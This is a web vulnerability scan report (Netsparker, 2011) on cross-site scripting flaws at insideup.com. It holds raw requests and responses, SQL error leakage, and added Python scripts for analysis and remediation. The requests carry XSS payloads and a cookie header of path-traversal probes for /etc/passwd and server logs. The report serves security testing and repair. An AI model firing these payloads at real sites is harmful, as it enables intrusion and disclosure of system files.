lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>' OR prj.project_page_url = 'leadflow/wede00/'"--></style></script><script>netsparker(0x00050F)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00050F)</script>/' union select prj.catI' at line 5
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST '"--></style></script><script>alert(0x000509)</script>

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000509)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:20 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D0030714F0C8C0E9F8ADA5D143BA6D35; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="'"--></style></script><script>netsparker(0x000509)</script>"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
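The two responses above show what "CONFIRMED" rests on: the marker the scanner sent (netsparker(0x00050F) on the leadflow path, netsparker(0x000509) in the whitePapaper.html url field) comes back verbatim, and in both pages a browser-style parse puts it inside a script element, because the leading ' and " close the surrounding quote, > closes the tag, and the payload then opens its own <script>. The leadflow response additionally leaks the application's own SQL text and the MySQL error. The following script, added here as an illustration and not part of Netsparker or the report, re-parses trimmed excerpts of those two bodies with Python's html.parser to classify where the marker lands and to flag the MySQL error string; the excerpts are cut down from the responses shown, and the class and function names are this example's own.

```python
"""Classify where a scanner marker lands in a captured response body.

Added example for this report, not Netsparker code. The two bodies below are
trimmed excerpts of the responses shown in the report (the leadflow SQL-error
page and the whitePapaper.html form); the helper names are assumptions.
"""
import re
from html.parser import HTMLParser

# Trimmed from the /ppc/leadflow/... response: the app echoes its own SQL text,
# with the raw path segment spliced into it, followed by the MySQL error.
LEADFLOW_BODY = (
    "select prj.catId,prj.project_page_url from lead_flow_one_pages_details prj "
    "where prj.project_page_url = 'leadflow/'\"--></style></script>"
    "<script>netsparker(0x000519)</script>' OR prj.project_page_url = "
    "'leadflow/'\"--></style></script><script>netsparker(0x000519)</script>/'"
    "You have an error in your SQL syntax; check the manual that corresponds "
    "to your MySQL server version for the right syntax to use near "
    "'></style></script><script>netsparker(0x000519)</script>/' union select "
    "prj.catI' at line 5"
)

# Trimmed from the /whitePapaper.html response: the url field is echoed back
# into a value="..." attribute without HTML encoding.
WHITEPAPER_BODY = (
    '<html><body><form method="post" action="/whitePapaper.html">'
    '<input name="email" type="text" value="netsparker@example.com"/>'
    '<input name="url" type="text" value="\'"--></style></script>'
    '<script>netsparker(0x000509)</script>"/>'
    '</form></body></html>'
)

MYSQL_ERROR = re.compile(r"You have an error in your SQL syntax.*?at line \d+")


class MarkerContexts(HTMLParser):
    """Record the HTML context of every occurrence of a marker string."""

    def __init__(self, marker):
        super().__init__()
        self.marker = marker
        self.contexts = set()
        self._open = []  # stack of currently open tag names

    def handle_starttag(self, tag, attrs):
        self._open.append(tag)
        for name, value in attrs:
            if value and self.marker in value:
                self.contexts.add("attr:%s@%s" % (tag, name))

    def handle_endtag(self, tag):
        # Tolerate stray end tags: the payload emits </style></script> with no opener.
        if tag in self._open:
            while self._open and self._open.pop() != tag:
                pass

    def handle_data(self, data):
        if self.marker in data:
            # Text inside an open <script> is JavaScript, not visible text.
            self.contexts.add("script" if "script" in self._open else "text")


def marker_contexts(body, marker):
    """Return the set of contexts in which marker appears in body."""
    parser = MarkerContexts(marker)
    parser.feed(body)
    parser.close()
    return parser.contexts


def sql_error_disclosed(body):
    """Return the MySQL syntax-error text if the page leaks one, else None."""
    match = MYSQL_ERROR.search(body)
    return match.group(0) if match else None


def assess(body, marker):
    """Return (marker_reaches_script_context, leaked_sql_error_or_None)."""
    return "script" in marker_contexts(body, marker), sql_error_disclosed(body)


if __name__ == "__main__":
    for name, body, marker in (
        ("leadflow", LEADFLOW_BODY, "netsparker(0x000519)"),
        ("whitepaper", WHITEPAPER_BODY, "netsparker(0x000509)"),
    ):
        executable, err = assess(body, marker)
        print(name, sorted(marker_contexts(body, marker)),
              "executable:", executable, "sql error leaked:", err is not None)
```

The check is deliberately structural: a marker that only appears as visible text, or inside an attribute value that stays quoted, would not be classified as executable, which is the difference between a reflection and a confirmed cross-site scripting finding. Any marker that is unique per request, as the 0x... values in this report are, works the same way.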
- /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E

/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000519)%3..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000519)</script>

Request

GET /ppc/leadflow/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000519)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1gfjos41ig74404n9arn5e7885; path=/
Content-Length: 2883
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR 
prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>' OR prj.project_page_url = 'leadflow/'"--></style></script><script>netsparker(0x000519)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000519)</script>/' union select prj.catI' at line 5
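Both leadflow findings (/ppc/leadflow/wede00/... and /ppc/leadflow/...) show the same failure: the request path is spliced into the text of a five-way UNION query over lead_flow_*_pages_details, MySQL rejects the result at line 5, and the page prints both the query and the error. The report files these under cross-site scripting only; the echoed query shows the path reaching the SQL parser, so a practitioner would also run the SQL Injection engine against this path, but no such finding appears in the report and none is claimed here. The script below, added as an illustration and not InsideUp's code, reproduces the concatenation bug against an in-memory SQLite table and shows the parameterized lookup beside it. Assumptions: a one-table, single-line version of the echoed query, an invented schema and row, SQLite rather than MySQL (the syntax error surfaces at a different point, since MySQL parses the payload's " and -- differently, but the cause is identical), and the helper names.

```python
"""Reproduce the leadflow lookup failure and show the hardened form.

Added example for this report, not InsideUp code. The query shape follows the
SQL text the leadflow pages echo (one table instead of the five-way UNION, on
one line); table schema, row data and helper names are assumptions.
"""
import html
import sqlite3

# The URI-based payload from the report, as the application saw it.
PAYLOAD = "'\"--></style></script><script>netsparker(0x000519)</script>"
PATH = "leadflow/" + PAYLOAD


def make_db():
    """Assumed schema: the real table has more columns and four siblings."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE lead_flow_one_pages_details "
               "(catId INTEGER, groupId INTEGER, templateId INTEGER, "
               "project_page_url TEXT)")
    db.execute("INSERT INTO lead_flow_one_pages_details "
               "VALUES (20001, 1, 1, 'leadflow/wede00/')")
    return db


def lookup_concat(db, path):
    """The pattern the report evidences: the path is spliced into the SQL text.

    Returns ("rows", rows) on success or ("error", query, message) when the
    database rejects the statement. The live page printed query and message
    straight into the response body, which is where the XSS came from.
    """
    query = ("SELECT catId FROM lead_flow_one_pages_details "
             "WHERE project_page_url = '%s' OR project_page_url = '%s/'"
             % (path, path))
    try:
        return ("rows", db.execute(query).fetchall())
    except sqlite3.Error as exc:
        return ("error", query, str(exc))


def lookup_param(db, path):
    """Hardened form: the path travels as a bound value, never as SQL text."""
    query = ("SELECT catId FROM lead_flow_one_pages_details "
             "WHERE project_page_url = ? OR project_page_url = ?")
    return db.execute(query, (path, path + "/")).fetchall()


def render_error(query, message):
    """If debugging output must be shown at all, HTML-encode it first."""
    return "<pre>%s\n%s</pre>" % (html.escape(query), html.escape(message))


if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "leadflow/wede00"))   # normal path resolves
    result = lookup_concat(db, PATH)              # payload breaks the SQL
    print(result[0], result[2] if result[0] == "error" else result[1])
    print(lookup_param(db, PATH))                 # bound value: no row, no error
    print(render_error(result[1], result[2]))     # no live <script> survives
```

Two fixes are needed, not one: binding the value stops the path from being parsed as SQL, and removing (or at minimum HTML-encoding) the diagnostic output stops the reflected script. Fixing only the query would still leave the raw path echoed wherever the application prints it.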
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
